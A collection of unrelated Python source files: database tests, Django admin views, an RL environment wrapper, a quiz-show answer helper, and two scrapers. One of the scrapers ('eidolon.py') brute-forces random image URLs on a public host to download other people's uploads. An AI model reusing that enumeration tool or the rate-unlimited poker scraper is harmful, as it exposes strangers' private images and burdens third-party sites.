curs.execute("LOCK table2 IN ACCESS EXCLUSIVE MODE") step2.set() curs.execute("LOCK table1 IN ACCESS EXCLUSIVE MODE") except psycopg2.DatabaseError as exc: self.thread2_error = exc step2.set() conn.close() # Run the threads in parallel. The "step1" and "step2" events # ensure that the two transactions overlap. thread1 = threading.Thread(target=task1) thread2 = threading.Thread(target=task2) thread1.start() thread2.start() thread1.join() thread2.join() # Exactly one of the threads should have failed with # TransactionRollbackError: self.assertFalse(self.thread1_error and self.thread2_error) error = self.thread1_error or self.thread2_error self.assertTrue(isinstance( error, psycopg2.extensions.TransactionRollbackError)) @slow def test_serialisation_failure(self): self.thread1_error = self.thread2_error = None step1 = threading.Event() step2 = threading.Event() def task1(): try: conn = self.connect() curs = conn.cursor() curs.execute("SELECT name FROM table1 WHERE id = 1") curs.fetchall() step1.set() step2.wait() curs.execute("UPDATE table1 SET name='task1' WHERE id = 1") conn.commit() except psycopg2.DatabaseError as exc: self.thread1_error = exc step1.set() conn.close() def task2(): try: conn = self.connect() curs = conn.cursor() step1.wait() curs.execute("UPDATE table1 SET name='task2' WHERE id = 1") conn.commit() except psycopg2.DatabaseError as exc: self.thread2_error = exc step2.set() conn.close() # Run the threads in parallel. The "step1" and "step2" events # ensure that the two transactions overlap. thread1 = threading.Thread(target=task1) thread2 = threading.Thread(target=task2) thread1.start() thread2.start() thread1.join() thread2.join() # Exactly one of the threads should have failed with # TransactionRollbackError: self.assertFalse(self.thread1_error and self.thread2_error) error = self.thread1_error or self.thread2_error self.assertTrue(isinstance( error, psycopg2.extensions.TransactionRollbackError)) class QueryCancellationTests(ConnectingTestCase): """Tests for query cancellation.""" def setUp(self): ConnectingTestCase.setUp(self) self.conn.set_isolation_level(ISOLATION_LEVEL_SERIALIZABLE) @skip_before_postgres(8, 2) def test_statement_timeout(self): curs = self.conn.cursor() # Set a low statement timeout, then sleep for a longer period. curs.execute('SET statement_timeout TO 10') self.assertRaises(psycopg2.extensions.QueryCanceledError, curs.execute, 'SELECT pg_sleep(50)') def test_suite(): return unittest.TestLoader().loadTestsFromName(__name__) if __name__ == "__main__": unittest.main()
views.py
import threading from datetime import datetime from django.contrib import messages from django.core.cache import cache from django.shortcuts import HttpResponseRedirect, reverse from django.views.generic import FormView from django.views.generic import View from django.views.generic.list import ListView from dispatcher.models import Server from dispatcher.manage import update_token from problem.models import Problem from problem.tasks import upload_problem_to_judge_server from .forms import ServerEditForm, ServerUpdateTokenForm from ..base_views import BaseCreateView, BaseUpdateView, BaseBackstageMixin class ServerCreate(BaseCreateView): form_class = ServerEditForm template_name = 'backstage/server/server_add.jinja2' def get_redirect_url(self, instance): return reverse('backstage:server') class ServerUpdate(BaseUpdateView): form_class = ServerEditForm template_name = 'backstage/server/server_edit.jinja2' queryset = Server.objects.all() def get_redirect_url(self, instance): return reverse('backstage:server') class ServerList(BaseBackstageMixin, ListView): template_name = 'backstage/server/server.jinja2' queryset = Server.objects.all() context_object_name = 'server_list' def get_context_data(self, **kwargs): data = super(ServerList, self).get_context_data(**kwargs) data['server_synchronize_status_detail'] = cache.get('server_synchronize_status_detail', '') data['server_synchronize_status'] = cache.get('server_synchronize_status', 0) return data class ServerRefresh(BaseBackstageMixin, View): def post(self, request, pk): server = Server.objects.get(pk=pk) server.serverproblemstatus_set.all().delete() messages.success(request, "Server status has been refreshed.") return HttpResponseRedirect(reverse('backstage:server')) class ServerEnableOrDisable(BaseBackstageMixin, View): def post(self, request, pk): server = Server.objects.get(pk=pk) server.enabled = not server.enabled server.save(update_fields=['enabled']) return HttpResponseRedirect(reverse('backstage:server')) class ServerDelete(BaseBackstageMixin, View): def post(self, request, pk): server = Server.objects.get(pk=pk) server.delete() messages.success(request, "Server <strong>%s</strong> is successfully removed." % server.name) return HttpResponseRedirect(reverse('backstage:server')) class ServerUpdateToken(BaseBackstageMixin, FormView): form_class = ServerUpdateTokenForm template_name = 'backstage/server/server_edit.jinja2' def post(self, request, *args, **kwargs): form = self.get_form() if form.is_valid(): server = Server.objects.get(pk=kwargs.get('pk')) if update_token(server, form.cleaned_data['new_password']): messages.success(request, 'Token update succeeded.') return HttpResponseRedirect(reverse('backstage:server')) messages.error(request, 'Update token failed. Please recheck your server status.') return HttpResponseRedirect(reverse('backstage:server')) class ServerSynchronize(BaseBackstageMixin, View): def post(self, request, pk): def synchronize_func(server): count = Problem.objects.all().count() for idx, problem in enumerate(Problem.objects.all(), start=1): cache.set('server_synchronize_status_detail', '%d / %d' % (idx, count), 60) cache.set('server_synchronize_status', idx / count * 100, 60) if not upload_problem_to_judge_server(problem, server): return server.last_synchronize_time = datetime.now() server.save(update_fields=['last_synchronize_time']) server = Server.objects.get(pk=pk) threading.Thread(target=synchronize_func, args=(server,)).start() return HttpResponseRedirect(reverse('backstage:server'))
Scraper_Main.py
import requests from bs4 import BeautifulSoup import time import os import sys import threading #Multi-threaded Hand History Scraper V2.2 #Contact me if you encounter significant connection errors or large numbers of attribute errors being logged. #Try to keep usage responsible as this script will pull data as quickly as possible and may cause the data host to be unhappy if overused. #If the total time running is greater than 0.2 seconds per hand either the connection is poor or you have been throttled by the site and should cease use immediately. timestart = time.time() def scrape(start,end,fileletter): filenumber = 1 for i in range(start,end): try: url = "https://anyrandompokernetwork.com/flashclient/gamehistory.php?gnr=%s&key=&nick=&note=" %(i) page = requests.get(url).content soup = BeautifulSoup(page, "lxml") textblock = soup.find("div",{"id":"div_urlcodes"}) textblock2 = textblock.find("textarea",{"id":"txt_handhistory"}) textblock2 = str(textblock2) textblock2 = textblock2.replace("""<textarea id="txt_handhistory" name="txt_handhistory" style="width:233px;height:50px;">""","") textblock2 = textblock2.replace("&lt;br&gt;","<br>") textblock2 = textblock2.replace("</textarea>","") except AttributeError: print "Hand", i, "not processed due to error" File = open("Error Log.txt", 'a') File.write("Hand %s not processed due to error"%(str(i))) File.write("\n") File.close() pass except "ConnectionError": print "ConnectionError" time.sleep(30) pass File = open("HH - %s%s.txt"%(fileletter,filenumber), 'a') if os.path.getsize("C:\Users\Desktop\Python\Betuniq Soup Scraper\HH 1\HH - %s%s.txt" %(fileletter,filenumber)) > 10000000: filenumber = filenumber + 1 File = open("HH - %s%s.txt" %(fileletter,filenumber), 'a') File.close() File = open("HH - %s%s.txt" %(fileletter,filenumber), 'a') File.write(textblock2) File.write("\n\n") File.close() print "Hand Number", i, "Processed" timeend = time.time() print "Total Time Running =", timeend - timestart, "Seconds." #Enter start/end page numbers for each thread (Leave the 3rd arg alone). #Feel free to add more threads if you feel you need to quickly expand the scope of data scraped. #I would suggest each thread having a range of no more than 1000. t1 = threading.Thread(target=scrape, args=(1,1001,"A")) t2 = threading.Thread(target=scrape, args=(1001,2001,"B")) t3 = threading.Thread(target=scrape, args=(2001,3001,"C")) t4 = threading.Thread(target=scrape, args=(3001,4001,"D")) t5 = threading.Thread(target=scrape, args=(4001,5001,"E")) t1.start() t2.start() t3.start() t4.start() t5.start() raw_input()
multi_envs_wrapper.py
import numpy as np import multiprocessing as mp from envs_utils import VecEnv, CloudpickleWrapper, clear_mpi_env_vars def worker(remote, parent_remote, env_fn_wrapper): parent_remote.close() env = env_fn_wrapper.x() try: while True: cmd, data = remote.recv() if cmd == 'step': ob, reward, done, info = env.step(data) if done: ob = env.reset() remote.send((ob, reward, done, info)) elif cmd == 'reset': ob = env.reset() remote.send(ob) elif cmd == 'render': remote.send(env.render(mode='rgb_array')) elif cmd == 'close': remote.close() break elif cmd == 'get_spaces_spec': remote.send((env.observation_space, env.action_space, env.spec)) else: raise NotImplementedError except KeyboardInterrupt: print('SubprocVecEnv worker: got KeyboardInterrupt') finally: env.close() class SubprocVecEnv(VecEnv): """ VecEnv that runs multiple environments in parallel in subproceses and communicates with them via pipes. Recommended to use when num_envs > 1 and step() can be a bottleneck. """ def __init__(self, env_fns, spaces=None, context='spawn'): """ Arguments: env_fns: iterable of callables - functions that create environments to run in subprocesses. Need to be cloud-pickleable """ self.waiting = False self.closed = False nenvs = len(env_fns) ctx = mp.get_context(context) self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(nenvs)]) self.ps = [ctx.Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))) for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)] for p in self.ps: p.daemon = True # if the main process crashes, we should not cause things to hang with clear_mpi_env_vars(): p.start() for remote in self.work_remotes: remote.close() self.remotes[0].send(('get_spaces_spec', None)) observation_space, action_space, self.spec = self.remotes[0].recv() self.viewer = None VecEnv.__init__(self, len(env_fns), observation_space, action_space) def step_async(self, actions): self._assert_not_closed() for remote, action in zip(self.remotes, actions): remote.send(('step', action)) self.waiting = True def step_wait(self): self._assert_not_closed() results = [remote.recv() for remote in self.remotes] self.waiting = False obs, rews, dones, infos = zip(*results) return _flatten_obs(obs), np.stack(rews), np.stack(dones), infos def reset(self): self._assert_not_closed() for remote in self.remotes: remote.send(('reset', None)) return _flatten_obs([remote.recv() for remote in self.remotes]) def close_extras(self): self.closed = True if self.waiting: for remote in self.remotes: remote.recv() for remote in self.remotes: remote.send(('close', None)) for p in self.ps: p.join() def get_images(self): self._assert_not_closed() for pipe in self.remotes: pipe.send(('render', None)) imgs = [pipe.recv() for pipe in self.remotes] return imgs def _assert_not_closed(self): assert not self.closed, "Trying to operate on a SubprocVecEnv after calling close()" def __del__(self): if not self.closed: self.close() def _flatten_obs(obs): assert isinstance(obs, (list, tuple)) assert len(obs) > 0 if isinstance(obs[0], dict): keys = obs[0].keys() return {k: np.stack([o[k] for o in obs]) for k in keys} else: return np.stack(obs)
main.py
# -*- coding:utf-8 -*- """ Million Heroes """ import multiprocessing from multiprocessing import Event from multiprocessing import Pipe import os import win32api import pythoncom from PIL import ImageFilter from threading import Thread import time from argparse import ArgumentParser import string import re import operator from functools import partial from terminaltables import AsciiTable import win32com.client import numpy as np from config import api_key from config import api_version from config import app_id from config import app_key from config import app_secret from config import data_directory from config import enable_chrome from config import image_compress_level from core.nn import * from config import prefer from config import crop_areas from config import reg from core.android import analyze_current_screen_text from core.android import save_screen from core.android import save_record from core.Slicer import * from core.ios import analyze_current_screen_text_ios from core.baiduzhidao import baidu_count from core.baiduzhidao import zhidao_tree from core.baiduzhidao import baidu_qmi_count from core.bingqa import bing_count from core.zhidaoqa import zhidao_count from core.soqa import so_count from core.airplayscr import check_exsit from core.chrome_search import run_browser from core.ocr.baiduocr import get_text_from_image as bai_get_text from core.ocr.spaceocr import get_text_from_image as ocrspace_get_text global isNegativeQuestion global origQuestion global test_key isExceptionGame = False isNegativeQuestion = False origQuestion = "" if prefer[0] == "baidu": get_text_from_image = partial(bai_get_text, app_id=app_id, app_key=app_key, app_secret=app_secret, api_version=api_version[1], timeout=5) elif prefer[0] == "ocrspace": get_test_from_image = partial(ocrspace_get_text, api_key=api_key) def parse_args(): parser = ArgumentParser(description="Million Hero Assistant") parser.add_argument( "-t", "--timeout", type=int, default=5, help="default http request timeout" ) return parser.parse_args() def parse_question_and_answer(text_list): global origQuestion,isExceptionGame question = "" start = 0 for i, keyword in enumerate(text_list): question += keyword if "?" in keyword: start = i + 1 break elif "?" in keyword: # 增加中文问号判断 start = i + 1 break elif keyword.endswith("."): start = i + 1 break elif keyword.endswith("。"): start = i + 1 break elif keyword.endswith("_"): # 新增问题里填空下划线的切分判断 start = i + 1 break elif keyword.endswith("是") and isExceptionGame==True: # 仅当知乎模式开启时以“是”字作为题目切分依据 start = i + 1 break elif keyword.endswith("为") and isExceptionGame == True: # 仅当知乎模式开启时以“为”字作为题目切分依据 start = i + 1 break # V4.7修正 如果OCR识别结果是英文字符那么不应以中文的.为切分依据 if question.find('.') >= 0: real_question = question.split(".")[-1] elif question.find('.') >= 0: real_question = question.split(".")[-1] else: if isExceptionGame==False: real_question = question.lstrip(string.digits) else: real_question = question origQuestion = real_question # 新增题目模式识别 global isNegativeQuestion isNegativeQuestion = False if real_question.find(',')>=0: real_question_judge = real_question.split(',')[-1] else: real_question_judge = real_question.split(',')[-1] critical_word_list = [('没有','有'),('未', ''),('没在', '在'),('没出', '出'),('还未', '已'),('不', ''),('是错', '是对')] not_critical_word_list = ['不只','不单','不止','不入','不齿','不耻','不拔','不值'] isNegative = True for critical_word,new_word in critical_word_list: if real_question_judge.find(critical_word)>=0: for not_critical_word in not_critical_word_list: if real_question_judge.find(not_critical_word)>=0: isNegative = False break if isNegative == True: isNegativeQuestion = True real_question = real_question.replace(critical_word, new_word) question =real_question # 遗留问题:懒得改了 直接传值 # 增加识别异常符号处理 for ii in range(start,len(text_list)): text_list[ii] = re.sub(reg, "", text_list[ii]) text_list[ii] = text_list[ii].lower() return isNegativeQuestion, real_question, question, text_list[start:] def pre_process_question(keyword): """ strip charactor and strip ? :param question: :return: """ for char, repl in [("“", ""), ("”", ""), ("?", "")]: keyword = keyword.replace(char, repl) # V4.7修正 如果OCR识别结果是英文字符那么不应以中文的.为切分依据 if keyword.find('.')>=0: keyword = keyword.split(".")[-1] else: keyword = keyword.split(r".")[-1] keywords = keyword.split(" ") keyword = "".join([e.strip("\r\n") for e in keywords if e]) return keyword class SearchThread(Thread): def __init__(self, question,answer,timeout,delword,engine,numofquery=10): Thread.__init__(self) self.question = question self.answer = answer self.timeout = timeout self.engine = engine self.delword = delword self.numofquery = numofquery def run(self): if self.engine == 'baidu': self.result = baidu_count(self.question,self.answer,delword=self.delword,timeout=self.timeout,numofquery=self.numofquery) elif self.engine == 'baiduqmi': self.result = baidu_qmi_count(self.question, self.answer, delword=self.delword, timeout=self.timeout,numofquery=self.numofquery) elif self.engine == 'bing': self.result = bing_count(self.question,self.answer,delword=self.delword,timeout=self.timeout) elif self.engine == 'zhidao': self.result = zhidao_count(self.question, self.answer,delword=self.delword, timeout=self.timeout) elif self.engine == 'so': self.result = so_count(self.question, self.answer,delword=self.delword, timeout=self.timeout) elif self.engine == 'zhidaotree': self.result = zhidao_tree(self.question, self.answer, timeout=self.timeout) elif self.engine == 'speaker': speakword(self.answer) else: self.result = zhidao_count(self.question, self.answer,delword=self.delword, timeout=self.timeout) def get_result(self): return self.result def speakword(word): pythoncom.CoInitialize() speaker = win32com.client.Dispatch("SAPI.SpVoice") speaker.Speak(word) def speak(word): thds = SearchThread(0, word, 0, 0, 'speaker') thds.setDaemon(True) thds.start() def var(num): n = len(num) avg = 0 v = 0 for x in num: avg += x avg /= n for x in num: v += (avg - x) * (avg - x) v = pow(v,0.5) return v/(avg+1) def main(): global isExceptionGame args = parse_args() timeout = args.timeout speak("欢迎使用答题辅助器") print(""" 请先选择您是否需要开启Chrome浏览器辅助 它可以帮助您展示更多信息,但是也会降低结果匹配效率 【注意:若您使用可执行文件exe版本,这里请勿开启Chrome,否则报错】 输入 1-开启 2-不开启 """) chrome_sw = input("请输入数字: ") if chrome_sw == "1": enable_chrome = True elif chrome_sw == "2": enable_chrome = False else: enable_chrome = False if enable_chrome: closer = Event() noticer = Event() closer.clear() noticer.clear() reader, writer = Pipe() browser_daemon = multiprocessing.Process( target=run_browser, args=(closer, noticer, reader,)) browser_daemon.daemon = True browser_daemon.start() def __inner_job(): global isNegativeQuestion,origQuestion,isExceptionGame start = time.time() cur_path = os.path.abspath(os.curdir) path = cur_path + "\\screenshots" if not os.path.exists(path): os.makedirs(path) if game_platform!=3: if game_platform==2: text_binary = analyze_current_screen_text( directory=data_directory, compress_level=image_compress_level[0], crop_area = crop_areas[game_type] ) else: text_binary = analyze_current_screen_text_ios( directory=data_directory, compress_level=image_compress_level[0], crop_area=crop_areas[game_type] ) keywords = get_text_from_image( image_data=text_binary, ) if not keywords: print("本题不能识别,请尽快自行作答!") return true_flag, real_question, question, answers = parse_question_and_answer(keywords) else: true_flag, real_question, question, answers = parse_question_and_answer(test_key) orig_answer = answers # 分词预处理 allanswers = '' optioncount = 0 isNewAlgUsable = False isAnswerAllNum = False for i in answers: allanswers = allanswers + i optioncount += 1 if i.isdigit(): isAnswerAllNum = True if isAnswerAllNum == False: repeatanswers = get_repeat_num_seq(allanswers) else: repeatanswers = [['',0]] maxlen = 0 delword = '' # 预分词目标:找到选项中的重复部分,提升选项之间的差异性 if optioncount>=3: isNewAlgUsable = True if isNewAlgUsable: if isAnswerAllNum == False: for (d,x) in repeatanswers: if x>=3 and len(d)>maxlen: maxlen = len(d) delword = d else: delword = '' print("") print("*" * 40) print('题目: ' + origQuestion) print("*" * 40) # notice browser if enable_chrome: writer.send(question) noticer.set() search_question = pre_process_question(question) thd1 = SearchThread(search_question, answers, timeout, delword, 'baidu') thd2 = SearchThread(search_question, answers, timeout, delword, 'bing') thd3 = SearchThread(search_question, answers, timeout, delword, 'zhidao') thd7 = SearchThread(search_question, answers, timeout, delword, 'so') if isNewAlgUsable: # V4.7 修正OCR识别不全导致无法继续检索的问题。 Thanks To Github/Misakio (数组越界) search_question_1 = search_question + " " + answers[0].replace(delword, "") search_question_2 = search_question + " " + answers[1].replace(delword, "") search_question_3 = search_question + " " + answers[2].replace(delword, "") thd4 = SearchThread(search_question_1, answers, timeout, delword, 'baidu', numofquery=10) thd5 = SearchThread(search_question_2, answers, timeout, delword, 'baidu', numofquery=10) thd6 = SearchThread(search_question_3, answers, timeout, delword, 'baidu', numofquery=10) # QMI算法7线程 thd_QA1 = SearchThread(search_question_1, answers, timeout, delword, 'baiduqmi', numofquery=5) thd_QA2 = SearchThread(search_question_2, answers, timeout, delword, 'baiduqmi', numofquery=5) thd_QA3 = SearchThread(search_question_3, answers, timeout, delword, 'baiduqmi', numofquery=5) thd_A1 = SearchThread(answers[0], answers, timeout, delword, 'baiduqmi', numofquery=5) thd_A2 = SearchThread(answers[1], answers, timeout, delword, 'baiduqmi', numofquery=5) thd_A3 = SearchThread(answers[2], answers, timeout, delword, 'baiduqmi', numofquery=5) thd_Q = SearchThread(search_question, answers, timeout, delword, 'baiduqmi', numofquery=5) # 创立并发线程 if __name__ == '__main__': thd1.setDaemon(True) thd1.start() thd2.setDaemon(True) thd2.start() thd3.setDaemon(True) thd3.start() thd7.setDaemon(True) thd7.start() if isNewAlgUsable: thd4.setDaemon(True) thd4.start() thd5.setDaemon(True) thd5.start() thd6.setDaemon(True) thd6.start() thd_QA1.setDaemon(True) thd_QA1.start() thd_QA2.setDaemon(True) thd_QA2.start() thd_QA3.setDaemon(True) thd_QA3.start() thd_A1.setDaemon(True) thd_A1.start() thd_A2.setDaemon(True) thd_A2.start() thd_A3.setDaemon(True) thd_A3.start() thd_Q.setDaemon(True) thd_Q.start() # 顺序开启3线程 thd1.join() thd2.join() thd3.join() thd7.join() if isNewAlgUsable: thd4.join() thd5.join() thd6.join() thd_QA1.join() thd_QA2.join() thd_QA3.join() thd_A1.join() thd_A2.join() thd_A3.join() thd_Q.join() # 等待线程执行结束 summary = thd1.get_result() summary2 = thd2.get_result() summary3 = thd3.get_result() summary7 = thd7.get_result() if isNewAlgUsable: summary4 = thd4.get_result() summary5 = thd5.get_result() summary6 = thd6.get_result() num_QA1 = thd_QA1.get_result() num_QA2 = thd_QA2.get_result() num_QA3 = thd_QA3.get_result() num_A1 = thd_A1.get_result() num_A2 = thd_A2.get_result() num_A3 = thd_A3.get_result() num_Q = thd_Q.get_result() # 获取线程执行结果 # 下面开始合并结果并添加可靠性标志 creditFlag = True credit = 0 summary_t = summary for i in range(0,len(summary)): summary_t[answers[i]] += summary2[answers[i]] summary_t[answers[i]] += summary7[answers[i]] summary_t[answers[i]] += summary3[answers[i]] credit += summary_t[answers[i]] va = summary_t.values() if credit < 2 or var(summary_t.values()) < 0.71: creditFlag = False if isNegativeQuestion == False: summary_li = sorted(summary_t.items(), key=operator.itemgetter(1), reverse=True) else: summary_li = sorted(summary_t.items(), key=operator.itemgetter(1), reverse=False) summary_newalg = dict() if isNewAlgUsable: # 先算一下QMI指数 A1_qmi = (num_QA1) / (num_Q * num_A1) A2_qmi = (num_QA2) / (num_Q * num_A2) A3_qmi = (num_QA3) / (num_Q * num_A3) qmi_max = max(A1_qmi,A2_qmi,A3_qmi) # 配置模型控制参数 if isNegativeQuestion: weight1 = 10 adding1 = 1 weight2 = 1 adding2 = 10 else: weight1 = 10 adding1 = 1 weight2 = 1 adding2 = 10 a = (summary_t[orig_answer[0]]*weight1+adding1) * (((summary5[orig_answer[0]] + summary6[orig_answer[0]]))*weight2 +adding2 ) b = (summary_t[orig_answer[1]]*weight1+adding1) * (((summary4[orig_answer[1]] + summary6[orig_answer[1]]))*weight2 +adding2 ) c = (summary_t[orig_answer[2]]*weight1+adding1) * (((summary4[orig_answer[2]] + summary5[orig_answer[2]]))*weight2 +adding2 ) similar_max = max(a, b, c) # 以下判断没有严格的理论基础,暂时不开启 if isNegativeQuestion and creditFlag==False and False: a = similar_max - a + 1 b = similar_max - b + 1 c = similar_max - c + 1 a = float("%.6f" % ((a/(similar_max))*(A1_qmi/(qmi_max)))) b = float("%.6f" % ((b/(similar_max))*(A2_qmi/(qmi_max)))) c = float("%.6f" % ((c/(similar_max))*(A3_qmi/(qmi_max)))) summary_newalg.update({orig_answer[0]: (a)}) summary_newalg.update({orig_answer[1]: (b)}) summary_newalg.update({orig_answer[2]: (c)}) data = [("选项", "权重", "相似度")] topscore = 0 for ans, w in summary_li: if w > topscore: topscore = w for ans, w in summary_li: if isNegativeQuestion==False: if isNewAlgUsable: # 修正V4的BUG:可能导致不能继续识别的问题 data.append((ans, w, summary_newalg[ans])) else: data.append((ans, w, '0')) else: if isNewAlgUsable: data.append((ans, topscore-w+1, summary_newalg[ans])) else: data.append((ans, topscore - w + 1, '0')) table = AsciiTable(data) print(table.table) print("") end = time.time() print("分析结果 耗时 {0} 秒 听语音更靠谱".format("%.1f" % (end - start))) print("*" * 40) print("") if creditFlag == False: print(" !【 本题预测结果不是很可靠,请慎重 】 !") if isNegativeQuestion==True: print(" !【 本题是否定提法,已帮您优化结果! 】 !") if isNewAlgUsable==False: print(" √ 混合算法建议 : ", summary_li[0][0],' (第',orig_answer.index(summary_li[0][0])+1,'项)') # 测试:新匹配算法 if isNegativeQuestion == True: ngflg = '1' else: ngflg = '0' if isNewAlgUsable: if isNegativeQuestion == False: summary_li2 = sorted(summary_newalg.items(), key=operator.itemgetter(1), reverse=True) #True else: summary_li2 = sorted(summary_newalg.items(), key=operator.itemgetter(1), reverse=False) #False print(" √ 关联算法建议 : ", summary_li2[0][0],' (第',orig_answer.index(summary_li2[0][0])+1,'项)') # 神经网络计算,采用预训练参数 feature = np.array( [int(summary_t[orig_answer[0]]), int(summary_t[orig_answer[1]]), int(summary_t[orig_answer[2]]), int(summary4[orig_answer[0]]), int(summary4[orig_answer[1]]), int(summary4[orig_answer[2]]), int(summary5[orig_answer[0]]), int(summary5[orig_answer[1]]), int(summary5[orig_answer[2]]), int(summary6[orig_answer[0]]), int(summary6[orig_answer[1]]), int(summary6[orig_answer[2]]), float('%.5f' % (A1_qmi / qmi_max)), float('%.5f' % (A2_qmi / qmi_max)), float('%.5f' % (A3_qmi / qmi_max))]) feature = np.matrix(feature) nn_re = predict(feature, get_theta1(isNegativeQuestion), get_theta2(isNegativeQuestion)) nn_re = nn_re[0] #print(nn_re) nn_re = nn_re.index(max(nn_re)) print(' √ 神经网络输出 : ', orig_answer[nn_re], ' (第', str(nn_re + 1), '项)') if orig_answer.index(summary_li2[0][0]) == nn_re and creditFlag==True: print(" √ 【 结果可信度高 ,选择 第",orig_answer.index(summary_li[0][0])+1,"项 !】") speak("第{}项{}".format(orig_answer.index(summary_li[0][0])+1,summary_li[0][0])) print(" × 排除选项 : ", summary_li2[-1][0]) elif creditFlag==False: speak("谨慎第{}项谨慎".format(orig_answer.index(summary_li2[0][0]) + 1)) print(" × 排除选项 : ", summary_li2[-1][0]) else: speak("谨慎第{}项谨慎".format(nn_re + 1)) print(" × 排除选项 : ", summary_li[-1][0]) else: speak("谨慎第{}项谨慎".format(orig_answer.index(summary_li[0][0])+1)) print("选项识别有些问题,新算法此题未开启") print(" × 排除选项 : ", summary_li[-1][0]) if game_platform==3: print('') print(orig_answer) real_answer = input("请输入本题正确答案:") with open('testset_record_feature.txt', 'a+') as f: featurestr = str(summary_t[orig_answer[0]]) + '|' + str(summary_t[orig_answer[1]]) + '|' + str(summary_t[orig_answer[2]]) featurestr += '|' + str(summary4[orig_answer[0]]) + '|' + str(summary4[orig_answer[1]]) + '|' + str(summary4[orig_answer[2]]) featurestr += '|' + str(summary5[orig_answer[0]]) + '|' + str(summary5[orig_answer[1]]) + '|' + str(summary5[orig_answer[2]]) featurestr += '|' + str(summary6[orig_answer[0]]) + '|' + str(summary6[orig_answer[1]]) + '|' + str(summary6[orig_answer[2]]) featurestr += '|' + ('%.5f' % (A1_qmi/qmi_max)) + '|' + ('%.5f' % (A2_qmi/qmi_max)) + '|' + ('%.5f' % (A3_qmi/qmi_max)) + '|' + ngflg + '|' + real_answer + '\n' f.write(featurestr) if game_platform != 3 : # 输出知识树 thdtree = SearchThread(search_question, answers, timeout, delword, 'zhidaotree') thdtree.setDaemon(True) thdtree.start() thdtree.join() summary_tree = thdtree.get_result() print("") print("") print("辅助知识树") print("*" * 40) for ans in summary_tree: print(ans) save_screen( directory=data_directory ) save_record( origQuestion, orig_answer ) print(""" Branch版本:V5.1 Branch作者:GitHub/leyuwei 请选择答题节目: 1. 百万英雄 2. 冲顶大会 3. 知乎答题 """) game_type = input("输入游戏编号: ") if game_type == "1": game_type = '百万英雄' isExceptionGame = False elif game_type == "2": game_type = '冲顶大会' isExceptionGame = False elif game_type == "3": game_type = '知乎答题' isExceptionGame = True else: game_type = '百万英雄' isExceptionGame = False print(""" 操作平台的一些说明:如果您是iOS,则必须使用您的电脑创建WiFi热点并将您的iOS设备连接到该热点, 脚本即将为您打开投屏软件,您需要按照软件的提示进行操作。 如果您使用的是Android则无需担心,将您的设备使用数据线连接电脑,开启Adb 调试即可正常使用该脚本。 请选择您的设备平台: 1. iOS 2. Android 3. 测试集特征添加(仅供开发者用) """) game_platform = input("输入平台编号: ") if game_platform == "1": game_platform = 1 if check_exsit()==0: print("正在唤醒投屏软件,请同意管理员权限并按照软件要求将您的iOS设备投放在电脑屏幕上,最后再回到该脚本进行操作。") win32api.ShellExecute(0, 'open', 'airplayer.exe', '', '', 0) else: print("投屏软件已经启动。") elif game_platform == "2": game_platform = 2 elif game_platform == "3": game_platform = 3 else: game_platform = 1 os.system("cls") # Windows清屏 while True: print(""" ------------------------------------ 请在答题开始前运行程序, 答题开始的时候按Enter预测答案 ------------------------------------ """) if game_platform!=3: enter = input("按Enter键开始,按ESC键退出...") if enter == chr(27): break os.system("cls") # Windows清屏 try: __inner_job() except Exception as e: print("截图分析过程中出现故障,请确认设备是否连接正确(投屏正常),网络是否通畅!") speak("出现问题!") else: if os.path.exists('testset_record.txt'): with open('testset_record.txt', 'r') as f: reclist = f.readlines() for rec in reclist: recitem = rec.split('|') test_key = recitem[0:4] test_key[0] = '1.'+test_key[0] try: __inner_job() except Exception as e: print("添加特征值过程中出现故障。") break if enable_chrome: reader.close() writer.close() closer.set() time.sleep(3) if __name__ == "__main__": main()
eidolon.py
# Made by @venaxyt on Github import threading, requests, gratient, random, string, os banner = """ ▄███▄ ▄█ ██▄ ████▄ █ ████▄ ▄ █▀ ▀ ██ █ █ █ █ █ █ █ █ ██▄▄ ██ █ █ █ █ █ █ █ ██ █ █▄ ▄▀ ▐█ █ █ ▀████ ███▄ ▀████ █ █ █ ▀███▀ ▐ ███▀ ▀ █ █ █ v e n a x █ ██ """ print(gratient.purple(banner)) image_directory = f"C:\\Users\\{os.getenv('UserName')}\\Desktop\\images" def FREEIMAGEHOST(): while True: image_code = "".join(random.choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(6)) FREEIMAGEHOST_image_link = f"https://iili.io/{image_code}.png" FREEIMAGEHOST_image = requests.get(FREEIMAGEHOST_image_link) if FREEIMAGEHOST_image.status_code == 200: print(gratient.blue(f" [>] FREEIMAGEHOST : {FREEIMAGEHOST_image_link}"), end = "") FREEIMAGEHOST_image_download = requests.get(FREEIMAGEHOST_image_link) open(f"{image_directory}\\{image_code}.png", "wb").write(FREEIMAGEHOST_image_download.content) # v e n a x threading.Thread(target = FREEIMAGEHOST).start(); threading.Thread(target = FREEIMAGEHOST).start(); threading.Thread(target = FREEIMAGEHOST).start(); threading.Thread(target = FREEIMAGEHOST).start()
SpecialRunner.py
import os from threading import Thread from subprocess import Popen, PIPE from time import sleep, time from select import select class SpecialRunner: """ This class provides the interface to run special job types like CWL, WDL and HPC. """ def __init__(self, config, job_id, logger=None): """ Inputs: config dictionary, Job ID, and optional logger """ self.config = config self.top_job_id = job_id self.logger = logger self.token = config["token"] self.workdir = config.get("workdir", "/mnt/awe/condor") self.shareddir = os.path.join(self.workdir, "workdir/tmp") self.containers = [] self.threads = [] self.allowed_types = ["slurm", "wdl"] _BATCH_POLL = 10 _FILE_POLL = 10 _MAX_RETRY = 5 def run(self, config, data, job_id, callback=None, fin_q=[]): # TODO: # initialize working space # check job type against an allow list # submit the job and map the batch jobb to the job id # start a thread to monitor progress (module, method) = data["method"].split(".") if module != "special": err = "Attempting to run the wrong type of module. " err += "The module should be 'special'" raise ValueError(err) if method not in self.allowed_types: raise ValueError("Invalid special method type") if method == "slurm": return self._batch_submit(method, config, data, job_id, fin_q) elif method == "wdl": return self._wdl_run(method, config, data, job_id, fin_q) def _check_batch_job(self, check, slurm_jobid): cmd = [check, slurm_jobid] proc = Popen(cmd, stdout=PIPE, stderr=PIPE) stdout, stderr = proc.communicate() return stdout.decode("utf-8").rstrip() def _watch_batch(self, stype, job_id, slurm_jobid, outfile, errfile, queues): self.logger.log("Watching Slurm Job ID %s" % (slurm_jobid)) check = "%s_checkjob" % (stype) cont = True retry = 0 # Wait for job to start out output file to appear while cont: 